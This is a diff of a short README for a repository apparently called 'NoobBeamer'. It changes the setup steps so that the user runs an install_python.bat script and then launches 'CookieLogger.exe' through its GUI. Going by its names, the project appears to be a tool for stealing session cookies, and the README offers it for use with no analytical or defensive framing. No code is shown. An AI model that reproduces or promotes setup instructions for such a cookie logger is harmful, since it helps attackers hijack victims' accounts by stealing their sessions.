BlankoScript08/NoobBeamer/README.md

 Step 1; Download Zip and extract

-Step 2; Run the requirements file and wait until it finishes and installs all requirements
+Step 2; install_python.bat it will install python for you

 Step 3; run the CookieLogger.exe file and wait until the gui opens